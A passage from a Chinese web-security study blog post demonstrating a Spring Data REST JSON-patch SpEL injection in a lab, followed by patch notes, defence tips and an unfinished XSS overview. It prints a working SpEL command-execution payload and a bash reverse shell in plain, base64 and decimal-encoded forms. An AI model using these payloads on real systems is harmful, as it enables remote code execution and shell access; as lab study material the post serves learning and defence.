<pre class="line-numbers language-cmd" data-language="cmd"><code class="language-cmd">curl -i -X POST -H "Content-Type: application/json-patch+json" -d "{""first name"":""si"",""lastname"":""Li""}" http://192.168.56.102:81/customers<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>
<p><img src="https://gitee.com/lastlight/MyPictrue/raw/master/img/20210825-131431118.png" alt=""></p>
<p><img src="https://gitee.com/lastlight/MyPictrue/raw/master/img/20210825-134949328.png" alt="漏洞利用"></p>
<pre class="line-numbers language-json" data-language="json"><code class="language-json"><span class="token punctuation">[</span><span class="token punctuation">{</span> <span class="token property">"op"</span><span class="token operator">:</span> <span class="token string">"replace"</span><span class="token punctuation">,</span> <span class="token property">"path"</span><span class="token operator">:</span> <span class="token string">"T(java.lang.Runtime).getRuntime().exec(new java.lang.String(new byte[]{116,111,117,99,104,32,47,116,109,112,47,115,117,99,99,101,115,115}))/lastName"</span><span class="token punctuation">,</span> <span class="token property">"value"</span><span class="token operator">:</span> <span class="token string">"test"</span> <span class="token punctuation">}</span><span class="token punctuation">]</span><span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>
<p><img src="https://gitee.com/lastlight/MyPictrue/raw/master/img/20210825-135948546.png" alt=""></p>
<blockquote>
<p><strong>反弹shell</strong></p>
<p>bash -i &gt;&amp; /dev/tcp/ip/port 0&gt;&amp;1</p>
<p><strong>base64编码</strong></p>
<p>bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjAuMTAzLzc3NzcgMD4mMQ==}|{base64,-d}|{bash,-i}</p>
<p><strong>进制转换</strong></p>
<p>98,97,115,104,32,45,99,32,123,101,99,104,111,44,89,109,70,122,97,67,65,116,97,83,65,43,74,105,65,118,90,71,86,50,76,51,82,106,99,67,56,120,79,84,73,117,77,84,89,52,76,106,65,117,77,84,65,122,76,122,99,51,78,122,99,103,77,68,52,109,77,81,61,61,125,124,123,98,97,115,101,54,52,44,45,100,125,124,123,98,97,115,104,44,45,105,125</p>
</blockquote>
<p><strong>漏洞分析</strong></p>
<p><img src="https://gitee.com/lastlight/MyPictrue/raw/master/img/20210825-vulnerability-analysis.png" alt=""></p>
<p><strong>漏洞修复</strong></p>
<p>在 1.5.7 版本中就对漏洞进行了修复，PatchOperation 类的 evaluateValueFromTarget 方法里面加入了verifyPath, 对路径的有效性做了验证，主要过滤了数字</p>
<p><img src="https://gitee.com/lastlight/MyPictrue/raw/master/img/20210825-141237193.png" alt=""></p>
<h4 id="防御措施">防御措施</h4>
<ul>
<li>
<p>关注官方网站，及时追踪更新</p>
</li>
<li>
<p>关注漏洞披露网站</p>
<p>CVE <a target="_blank" rel="noopener" href="https://cve.mitre.org/">https://cve.mitre.org/</a></p>
<p>Exploit Database <a target="_blank" rel="noopener" href="https://www.exploit-db.com">https://www.exploit-db.com</a></p>
<p>ZERODIUM <a target="_blank" rel="noopener" href="https://zerodium.com/">https://zerodium.com/</a></p>
</li>
</ul>
<h2 id="前端安全">前端安全</h2>
<h3 id="1-跨站脚本攻击（XSS）">1. 跨站脚本攻击（XSS）</h3>
<p>OWASP Top10 2017 第七，浏览器将用户输入的内容，当做脚本执行，执行了恶意的功能，这种针对用户浏览器的攻击即跨站脚本攻击</p>
<p><strong>XSS 危害</strong><br>
（JavaScript 能够写出的任意恶意功能）</p>
<ul>
<li>盗取 Cookie</li>
<li>盗取账户</li>
<li>恶意软件下载</li>
<li>键盘记录</li>
<li>广告引流</li>
</ul>
<h4 id="1-1-反射型">1.1 反射型</h4>
<p>应用程序或 API 包括未经验证和未经转义的用户输入， 直接作为 HTML 输出的一部分。一个成功的攻击可以让攻击者在受害者的浏览器中执行任意的 HTML 和 JavaScript</p>
<p>特点：非持久化，必须用户点击带有特定参数的链接才能引起</p>
<p>影响范围：仅执行脚本的用户</p>
<h4 id="1-2-存储型">1.2 存储型</h4>
<h4 id="1-3-DOM-型">1.3 DOM 型</h4>
<h3 id="2-CSRF">2. CSRF</h3>
<h3 id="3-RCE">3. RCE</h3>
<h2 id="容器安全">容器安全</h2>
<h3 id="Apache">Apache</h3>
<h3 id="Nginx">Nginx</h3>
<h3 id="Tomcat">Tomcat</h3>
<h2 id="互联网企业安全运营">互联网企业安全运营</h2>
<img src="https://gitee.com/lastlight/MyPictrue/raw/master/img/20210202-223222691.png" alt="image-20210202223222691" style="zoom: 70%;">
<h3 id="DDos">DDos</h3>
<h3 id="访问控制">访问控制</h3>

                
            </div>
            <hr/>

            

    <div class="reprint" id="reprint-statement">
        
            <div class="reprint__author">
                <span class="reprint-meta" style="font-weight: bold;">
                    <i class="fas fa-user">
                        文章作者:
                    </i>
                </span>
                <span class="reprint-info">
                    <a href="/about" rel="external nofollow noreferrer">宵烛</a>
                </span>
            </div>
            <div class="reprint__type">
                <span class="reprint-meta" style="font-weight: bold;">
                    <i class="fas fa-link">
                        文章链接:
                    </i>
                </span>
                <span class="reprint-info">
                    <a href="http://night-candle.github.io/2021/01/27/web-sec-basic/">http://night-candle.github.io/2021/01/27/web-sec-basic/</a>
                </span>
            </div>
            <div class="reprint__notice">
                <span class="reprint-meta" style="font-weight: bold;">
                    <i class="fas fa-copyright">
                        版权声明:
                    </i>
                </span>
                <span class="reprint-info">
                    本博客所有文章除特別声明外，均采用
                    <a href="https://creativecommons.org/licenses/by/4.0/deed.zh" rel="external nofollow noreferrer" target="_blank">CC BY 4.0</a>
                    许可协议。转载请注明来源
                    <a href="/about" target="_blank">宵烛</a>
                    !
                </span>
            </div>
        
    </div>

    <script async defer>
      document.addEventListener("copy", function (e) {
        let toastHTML = '<span>复制成功，请遵循本文的转载规则</span><button class="btn-flat toast-action" onclick="navToReprintStatement()" style="font-size: smaller">查看</a>';
        M.toast({html: toastHTML})
      });

      function navToReprintStatement() {
        $("html, body").animate({scrollTop: $("#reprint-statement").offset().top - 80}, 800);
      }
    </script>



            <div class="tag_share" style="display: block;">
                <div class="post-meta__tag-list" style="display: inline-block;">
                    
                        <div class="article-tag">
                            
                                <a href="/tags/%E5%89%8D%E7%AB%AF/">
                                    <span class="chip bg-color">前端</span>
                                </a>
                            
                                <a href="/tags/web%E5%AE%89%E5%85%A8/">
                                    <span class="chip bg-color">web安全</span>
                                </a>
                            
                                <a href="/tags/%E5%90%8E%E7%AB%AF/">
                                    <span class="chip bg-color">后端</span>
                                </a>
                            
                        </div>
                    
                </div>
                <div class="post_share" style="zoom: 80%; width: fit-content; display: inline-block; float: right; margin: -0.15rem 0;">
                    <link rel="stylesheet" type="text/css" href="/libs/share/css/share.min.css">
<div id="article-share">

    
    <div class="social-share" data-sites="qq,wechat,weibo" data-wechat-qrcode-helper="<p>微信扫一扫即可分享！</p>"></div>
    <script src="/libs/share/js/social-share.min.js"></script>
    

    

</div>

                </div>
            </div>
            
        </div>
    </div>

    

    

    

    

    

    

    

    

    

    

<article id="prenext-posts" class="prev-next articles">
    <div class="row article-row">
        
        <div class="article col s12 m6" data-aos="fade-up">
            <div class="article-badge left-badge text-color">
                <i class="fas fa-chevron-left"></i>&nbsp;上一篇</div>
            <div class="card">
                <a href="/2021/01/27/game-program-design/">
                    <div class="card-image">
                        
                        
                        <img src="/medias/featureimages/2.jpg" class="responsive-img" alt="游戏程序设计">
                        
                        <span class="card-title">游戏程序设计</span>
                    </div>
                </a>
                <div class="card-content article-content">
                    <div class="summary block-with-text">
                        
                            本文简述了游戏程序设计领域的知识，引导进入丰富的游戏程序设计的世界，探索更多未知，掌握更多游戏程序与开发的技巧
                        
                    </div>
                    <div class="publish-info">
                        <span class="publish-date">
                            <i class="far fa-clock fa-fw icon-date"></i>2021-01-27
                        </span>
                        <span class="publish-author">
                            
                            <i class="fas fa-bookmark fa-fw icon-category"></i>
                            
                            <a href="/categories/%E8%AE%A1%E7%A7%91/" class="post-category">
                                    计科
                                </a>
                            
                            
                        </span>
                    </div>
                </div>
                
                <div class="card-action article-tags">
                    
                    <a href="/tags/%E6%B8%B8%E6%88%8F/">
                        <span class="chip bg-color">游戏</span>
                    </a>
                    
                </div>
                
            </div>
        </div>
        
        
        <div class="article col s12 m6" data-aos="fade-up">
            <div class="article-badge right-badge text-color">
                下一篇&nbsp;<i class="fas fa-chevron-right"></i>
            </div>
            <div class="card">
                <a href="/2021/01/25/deeplearning-basic/">
                    <div class="card-image">
                        
                        
                        <img src="/medias/featureimages/27.jpg" class="responsive-img" alt="深度学习基础">
                        
                        <span class="card-title">深度学习基础</span>
                    </div>
                </a>
                <div class="card-content article-content">
                    <div class="summary block-with-text">
                        
                            本文是对深度学习的简单入门知识讲解
                        
                    </div>
                    <div class="publish-info">
                            <span class="publish-date">
                                <i class="far fa-clock fa-fw icon-date"></i>2021-01-25
                            </span>
                        <span class="publish-author">
                            
                            <i class="fas fa-bookmark fa-fw icon-category"></i>
                            
                            <a href="/categories/%E7%AC%94%E8%AE%B0/" class="post-category">
                                    笔记
                                </a>
                            
                            <a href="/categories/%E7%AC%94%E8%AE%B0/%E8%AE%A1%E7%A7%91/" class="post-category">
                                    计科
                                </a>
                            
                            
                        </span>
                    </div>
                </div>
                
                <div class="card-action article-tags">
                    
                    <a href="/tags/%E6%B7%B1%E5%BA%A6%E5%AD%A6%E4%B9%A0/">
                        <span class="chip bg-color">深度学习</span>
                    </a>
                    
                    <a href="/tags/NLP/">
                        <span class="chip bg-color">NLP</span>
                    </a>
                    
                </div>
                
            </div>
        </div>
        
    </div>
</article>

</div>


<script>
    $('#articleContent').on('copy', function (e) {
        // IE8 or earlier browser is 'undefined'
        if (typeof window.getSelection === 'undefined') return;

        var selection = window.getSelection();
        // if the selection is short let's not annoy our users.
        if (('' + selection).length < Number.parseInt('200')) {
            return;
        }

        // create a div outside of the visible area and fill it with the selected text.
        var bodyElement = document.getElementsByTagName('body')[0];
        var newdiv = document.createElement('div');
        newdiv.style.position = 'absolute';
        newdiv.style.left = '-99999px';
        bodyElement.appendChild(newdiv);
        newdiv.appendChild(selection.getRangeAt(0).cloneContents());

        // we need a <pre> tag workaround.
        // otherwise the text inside "pre" loses all the line breaks!
        if (selection.getRangeAt(0).commonAncestorContainer.nodeName === 'PRE' || selection.getRangeAt(0).commonAncestorContainer.nodeName === 'CODE') {
            newdiv.innerHTML = "<pre>" + newdiv.innerHTML + "</pre>";
        }

        var url = document.location.href;
        newdiv.innerHTML += '<br />'
            + '来源: 宵烛 Blog<br />'
            + '文章作者: 宵烛<br />'
            + '文章链接: <a href="' + url + '">' + url + '</a><br />'
            + '本文章著作权归作者所有，任何形式的转载都请注明出处。';

        selection.selectAllChildren(newdiv);
        window.setTimeout(function () {bodyElement.removeChild(newdiv);}, 200);
    });
</script>


<!-- 代码块功能依赖 -->
<script type="text/javascript" src="/libs/codeBlock/codeBlockFuction.js"></script>


  <!-- 是否加载使用自带的 prismjs. -->
  <script type="text/javascript" src="/libs/prism/prism.js"></script>


<!-- 代码语言 -->

<script type="text/javascript" src="/libs/codeBlock/codeLang.js"></script>


<!-- 代码块复制 -->

<script type="text/javascript" src="/libs/codeBlock/codeCopy.js"></script>


<!-- 代码块收缩 -->

<script type="text/javascript" src="/libs/codeBlock/codeShrink.js"></script>



    </div>
    <div id="toc-aside" class="expanded col l3 hide-on-med-and-down">
        <div class="toc-widget card" style="background-color: white;">
            <div class="toc-title"><i class="far fa-list-alt"></i>&nbsp;&nbsp;目录</div>
            <div id="toc-content"></div>
        </div>
    </div>
</div>

<!-- TOC 悬浮按钮. -->

<div id="floating-toc-btn" class="hide-on-med-and-down">
    <a class="btn-floating btn-large bg-color">
        <i class="fas fa-list-ul"></i>
    </a>
</div>


<script src="/libs/tocbot/tocbot.min.js"></script>
<script>
    $(function () {
        tocbot.init({
            tocSelector: '#toc-content',
            contentSelector: '#articleContent',
            headingsOffset: -($(window).height() * 0.4 - 45),
            collapseDepth: Number('0'),
            headingSelector: 'h1, h2, h3, h4, h5'
        });

        // Set scroll toc fixed.
        let tocHeight = parseInt($(window).height() * 0.4 - 64);
        let $tocWidget = $('.toc-widget');
        $(window).scroll(function () {
            let scroll = $(window).scrollTop();
            /* add post toc fixed. */
            if (scroll > tocHeight) {
                $tocWidget.addClass('toc-fixed');
            } else {
                $tocWidget.removeClass('toc-fixed');
            }
        });

        
        /* 修复文章卡片 div 的宽度. */
        let fixPostCardWidth = function (srcId, targetId) {
            let srcDiv = $('#' + srcId);
            if (srcDiv.length === 0) {
                return;
            }

            let w = srcDiv.width();
            if (w >= 450) {
                w = w + 21;
            } else if (w >= 350 && w < 450) {
                w = w + 18;
            } else if (w >= 300 && w < 350) {
                w = w + 16;
            } else {
                w = w + 14;
            }
            $('#' + targetId).width(w);
        };

        // 切换TOC目录展开收缩的相关操作.
        const expandedClass = 'expanded';
        let $tocAside = $('#toc-aside');
        let $mainContent = $('#main-content');
        $('#floating-toc-btn .btn-floating').click(function () {
            if ($tocAside.hasClass(expandedClass)) {
                $tocAside.removeClass(expandedClass).hide();
                $mainContent.removeClass('l9');
            } else {
                $tocAside.addClass(expandedClass).show();
                $mainContent.addClass('l9');
            }
            fixPostCardWidth('artDetail', 'prenext-posts');
        });
        
    });
</script>

    

</main>


<script src="https://cdn.bootcss.com/mathjax/2.7.5/MathJax.js?config=TeX-AMS-MML_HTMLorMML"></script>
<script>
    MathJax.Hub.Config({
        tex2jax: {inlineMath: [['$', '$'], ['\\(', '\\)']]}
    });
</script>



    <footer class="page-footer bg-color">
    

    <div class="container row center-align"
         style="margin-bottom: 0px !important;">
        <div class="col s12 m8 l8 copy-right">
            Copyright&nbsp;&copy;
            
                <span id="year">2019-2022</span>
            
            <a href="/about" target="_blank">宵烛</a>
            |&nbsp;Powered by&nbsp;<a href="https://hexo.io/" target="_blank">Hexo</a>
            |&nbsp;Theme&nbsp;<a href="https://github.com/blinkfox/hexo-theme-matery" target="_blank">Matery</a>
            <br>
            
                &nbsp;<i class="fas fa-chart-area"></i>&nbsp;站点总字数:&nbsp;<span
                        class="white-color">107.1k</span>
            
            
            
            
                <span id="busuanzi_container_site_pv">
                &nbsp;|&nbsp;<i class="far fa-eye"></i>&nbsp;总访问量:&nbsp;
                    <span id="busuanzi_value_site_pv" class="white-color"></span>
            </span>
            
            
                <span id="busuanzi_container_site_uv">
                &nbsp;|&nbsp;<i class="fas fa-users"></i>&nbsp;总访问人数:&nbsp;
                    <span id="busuanzi_value_site_uv" class="white-color"></span>
            </span>
            
            <br>

            <!-- 运行天数提醒. -->
            
            <br>
            
        </div>
        <div class="col s12 m4 l4 social-link ">
    <a href="https://github.com/night-candle" class="tooltipped" target="_blank" data-tooltip="访问我的GitHub" data-position="top" data-delay="50">
        <i class="fab fa-github"></i>
    </a>



    <a href="mailto:1219303301@qq.com" class="tooltipped" target="_blank" data-tooltip="邮件联系我" data-position="top" data-delay="50">
        <i class="fas fa-envelope-open"></i>
    </a>







    <a href="tencent://AddContact/?fromId=50&fromSubId=1&subcmd=all&uin=1219303301" class="tooltipped" target="_blank" data-tooltip="QQ联系我: 1219303301" data-position="top" data-delay="50">
        <i class="fab fa-qq"></i>
    </a>







</div>
    </div>
</footer>

<div class="progress-bar"></div>


    <!-- 搜索遮罩框 -->
<div id="searchModal" class="modal">
    <div class="modal-content">
        <div class="search-header">
            <span class="title"><i class="fas fa-search"></i>&nbsp;&nbsp;搜索</span>
            <input type="search" id="searchInput" name="s" placeholder="请输入搜索的关键字"
                   class="search-input">
        </div>
        <div id="searchResult"></div>
    </div>
</div>

<script type="text/javascript">
$(function () {
    var searchFunc = function (path, search_id, content_id) {
        'use strict';
        $.ajax({
            url: path,
            dataType: "xml",
            success: function (xmlResponse) {
                // get the contents from search data
                var datas = $("entry", xmlResponse).map(function () {
                    return {
                        title: $("title", this).text(),
                        content: $("content", this).text(),
                        url: $("url", this).text()
                    };
                }).get();
                var $input = document.getElementById(search_id);
                var $resultContent = document.getElementById(content_id);
                $input.addEventListener('input', function () {
                    var str = '<ul class=\"search-result-list\">';
                    var keywords = this.value.trim().toLowerCase().split(/[\s\-]+/);
                    $resultContent.innerHTML = "";
                    if (this.value.trim().length <= 0) {
                        return;
                    }
                    // perform local searching
                    datas.forEach(function (data) {
                        var isMatch = true;
                        var data_title = data.title.trim().toLowerCase();
                        var data_content = data.content.trim().replace(/<[^>]+>/g, "").toLowerCase();
                        var data_url = data.url;
                        data_url = data_url.indexOf('/') === 0 ? data.url : '/' + data_url;
                        var index_title = -1;
                        var index_content = -1;
                        var first_occur = -1;
                        // only match artiles with not empty titles and contents
                        if (data_title !== '' && data_content !== '') {
                            keywords.forEach(function (keyword, i) {
                                index_title = data_title.indexOf(keyword);
                                index_content = data_content.indexOf(keyword);
                                if (index_title < 0 && index_content < 0) {
                                    isMatch = false;
                                } else {
                                    if (index_content < 0) {
                                        index_content = 0;
                                    }
                                    if (i === 0) {
                                        first_occur = index_content;
                                    }
                                }
                            });
                        }
                        // show search results
                        if (isMatch) {
                            str += "<li><a href='" + data_url + "' class='search-result-title'>" + data_title + "</a>";
                            var content = data.content.trim().replace(/<[^>]+>/g, "");
                            if (first_occur >= 0) {
                                // cut out 100 characters
                                var start = first_occur - 20;
                                var end = first_occur + 80;
                                if (start < 0) {
                                    start = 0;
                                }
                                if (start === 0) {
                                    end = 100;
                                }
                                if (end > content.length) {
                                    end = content.length;
                                }
                                var match_content = content.substr(start, end);
                                // highlight all keywords
                                keywords.forEach(function (keyword) {
                                    var regS = new RegExp(keyword, "gi");
                                    match_content = match_content.replace(regS, "<em class=\"search-keyword\">" + keyword + "</em>");
                                });

                                str += "<p class=\"search-result\">" + match_content + "...</p>"
                            }
                            str += "</li>";
                        }
                    });
                    str += "</ul>";
                    $resultContent.innerHTML = str;
                });
            }
        });
    };

    searchFunc('/search.xml', 'searchInput', 'searchResult');
});
</script>

    <!-- 回到顶部按钮 -->
<div id="backTop" class="top-scroll">
    <a class="btn-floating btn-large waves-effect waves-light" href="#!">
        <i class="fas fa-arrow-up"></i>
    </a>
</div>


    <script src="/libs/materialize/materialize.min.js"></script>
    <script src="/libs/masonry/masonry.pkgd.min.js"></script>
    <script src="/libs/aos/aos.js"></script>
    <script src="/libs/scrollprogress/scrollProgress.min.js"></script>
    <script src="/libs/lightGallery/js/lightgallery-all.min.js"></script>
    <script src="/js/matery.js"></script>

    
        <!-- <script src='https://unpkg.com/mermaid@latest/dist/mermaid.min.js'></script> -->
        <script src='/libs/mermaid/mermaid.min.js'></script>
        <script>
          if (window.mermaid) {
            mermaid.initialize({theme: 'forest'});
          }
        </script>
    

    

    <!-- 雪花特效 -->
    

    <!-- 鼠标星星特效 -->
    

    

    <!-- Baidu Analytics -->

    <!-- Baidu Push -->

    
    

    

    

    <!--腾讯兔小巢-->
    
    

    

    

    
    <script src="/libs/instantpage/instantpage.js" type="module"></script>
    

</body>

</html>
